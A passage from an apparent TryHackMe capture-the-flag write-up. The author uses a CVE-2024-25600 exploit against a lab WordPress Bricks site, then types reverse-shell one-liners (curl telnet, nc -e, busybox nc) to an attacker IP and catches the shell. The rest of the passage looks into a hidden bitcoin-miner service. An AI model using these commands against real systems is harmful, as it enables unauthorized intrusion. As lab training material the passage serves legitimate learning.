  Downloading pygments-2.17.2-py3-none-any.whl.metadata (2.6 kB)
Collecting mdurl~=0.1 (from markdown-it-py>=2.2.0->rich->-r requirements.txt (line 5))
  Downloading mdurl-0.1.2-py3-none-any.whl.metadata (1.6 kB)
Collecting soupsieve>1.2 (from beautifulsoup4->bs4->-r requirements.txt (line 2))
  Downloading soupsieve-2.5-py3-none-any.whl.metadata (4.7 kB)
Downloading alive_progress-3.1.5-py3-none-any.whl (75 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 76.0/76.0 kB 17.6 kB/s eta 0:00:00
Downloading about_time-4.2.1-py3-none-any.whl (13 kB)
Downloading bs4-0.0.2-py2.py3-none-any.whl (1.2 kB)
Downloading prompt_toolkit-3.0.43-py3-none-any.whl (386 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 386.1/386.1 kB 23.7 kB/s eta 0:00:00
Downloading requests-2.31.0-py3-none-any.whl (62 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 62.6/62.6 kB 24.0 kB/s eta 0:00:00
Downloading rich-13.7.1-py3-none-any.whl (240 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 240.7/240.7 kB 16.7 kB/s eta 0:00:00
Downloading certifi-2024.2.2-py3-none-any.whl (163 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 163.8/163.8 kB 12.8 kB/s eta 0:00:00
Downloading charset_normalizer-3.3.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (140 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 140.3/140.3 kB 18.8 kB/s eta 0:00:00
Downloading idna-3.7-py3-none-any.whl (66 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 66.8/66.8 kB 18.3 kB/s eta 0:00:00
Downloading markdown_it_py-3.0.0-py3-none-any.whl (87 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 87.5/87.5 kB 23.3 kB/s eta 0:00:00
Downloading pygments-2.17.2-py3-none-any.whl (1.2 MB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 1.2/1.2 MB 18.2 kB/s eta 0:00:00
Downloading urllib3-2.2.1-py3-none-any.whl (121 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 121.1/121.1 kB 16.1 kB/s eta 0:00:00
Downloading beautifulsoup4-4.12.3-py3-none-any.whl (147 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 147.9/147.9 kB 18.6 kB/s eta 0:00:00
Downloading wcwidth-0.2.13-py2.py3-none-any.whl (34 kB)
Downloading mdurl-0.1.2-py3-none-any.whl (10.0 kB)
Downloading soupsieve-2.5-py3-none-any.whl (36 kB)
Building wheels for collected packages: grapheme
  Building wheel for grapheme (pyproject.toml) ... done
  Created wheel for grapheme: filename=grapheme-0.6.0-py3-none-any.whl size=210078 sha256=fbdc53ce28a739bd023fe2fa13724076906e82c58d137536e74b64655a175a8d
  Stored in directory: /home/kali/.cache/pip/wheels/ee/3b/0b/1b865800e916d671a24028d884698674138632a83fdfad4926
Successfully built grapheme
Installing collected packages: wcwidth, grapheme, urllib3, soupsieve, pygments, prompt_toolkit, mdurl, idna, charset-normalizer, certifi, about-time, requests, markdown-it-py, beautifulsoup4, alive_progress, rich, bs4
Successfully installed about-time-4.2.1 alive_progress-3.1.5 beautifulsoup4-4.12.3 bs4-0.0.2 certifi-2024.2.2 charset-normalizer-3.3.2 grapheme-0.6.0 idna-3.7 markdown-it-py-3.0.0 mdurl-0.1.2 prompt_toolkit-3.0.43 pygments-2.17.2 requests-2.31.0 rich-13.7.1 soupsieve-2.5 urllib3-2.2.1 wcwidth-0.2.13

┌──(venv)─(kali㉿kali)-[~/CVE-2024-25600-main]
└─$ python exploit.py -u https://bricks.thm
[*] Nonce found: 964a6e9b87
[+] https://bricks.thm is vulnerable to CVE-2024-25600. Command output: apache
[!] Shell is ready, please type your commands UwU
# whoami
apache    
      
# C='curl -Ns telnet://10.11.85.12:9001'; $C </dev/null 2>&1 | sh 2>&1 | $C >/dev/null
[-] No valid response received or target not vulnerable.
# whoami
apache 

# nc 10.11.85.12 9001 -e sh
[-] No valid response received or target not vulnerable.
# busybox nc 10.11.85.12 9001 -e sh

┌──(kali㉿kali)-[~/CVE-2024-25600-main]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.11.85.12] from (UNKNOWN) [10.10.239.202] 55846
whoami
apache
python -c 'import pty;pty.spawn("/bin/bash")'
apache@tryhackme:/data/www/default$

4 - Looking around

We are supposed to find the name of a suspicious process. ps-aux does not give any useful info. However, if we list services, we find: (grepping because output is too huge without it)

apache@tryhackme:/data/www/default$ systemctl | grep TRYHACK
systemctl | grep TRYHACK
  ubuntu.service                                   loaded active     running   TRYHACK3M

The above outputs the name of a service, not the process that is executec by this service:

apache@tryhackme:/data/www/default$ systemctl status ubuntu.service
systemctl status ubuntu.service
● ubuntu.service - TRYHACK3M
     Loaded: loaded (/etc/systemd/system/ubuntu.service; enabled; vendor preset: enabled)
     Active: active (running) since Sat 2024-05-04 07:42:43 UTC; 3min 27s ago
   Main PID: 2739 (nm-inet-dialog)
      Tasks: 2 (limit: 4671)
     Memory: 30.6M
     CGroup: /system.slice/ubuntu.service
             ├─2739 /lib/NetworkManager/nm-inet-dialog
             └─2740 /lib/NetworkManager/nm-inet-dialog

5 - Digging into the miner

apache@tryhackme:/lib/NetworkManager$ systemctl list-unit-files ubuntu.service
<rkManager$ systemctl list-unit-files ubuntu.service
 UNIT FILE      STATE   VENDOR PRESET
ubuntu.service enabled enabled      

1 unit files listed.
apache@tryhackme:/lib/NetworkManager$ ls
 ls
VPN		nm-dispatcher		nm-openvpn-service
conf.d		nm-iface-helper		nm-openvpn-service-openvpn-helper
dispatcher.d	nm-inet-dialog		nm-pptp-auth-dialog
inet.conf	nm-initrd-generator	nm-pptp-service
nm-dhcp-helper	nm-openvpn-auth-dialog	system-connections
apache@tryhackme:/lib/NetworkManager$ head inet.conf
head inet.conf
ID: 5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d
2024-04-08 10:46:04,743 [*] confbak: Ready!
2024-04-08 10:46:04,743 [*] Status: Mining!
2024-04-08 10:46:08,745 [*] Miner()
2024-04-08 10:46:08,745 [*] Bitcoin Miner Thread Started
2024-04-08 10:46:08,745 [*] Status: Mining!
2024-04-08 10:46:10,747 [*] Miner()
2024-04-08 10:46:12,748 [*] Miner()
2024-04-08 10:46:14,751 [*] Miner()
2024-04-08 10:46:16,753 [*] Miner()
apache@tryhackme:/lib/NetworkManager$

PreviousRabbit Hole NextValley

Last updated 1 year ago

Was this helpful?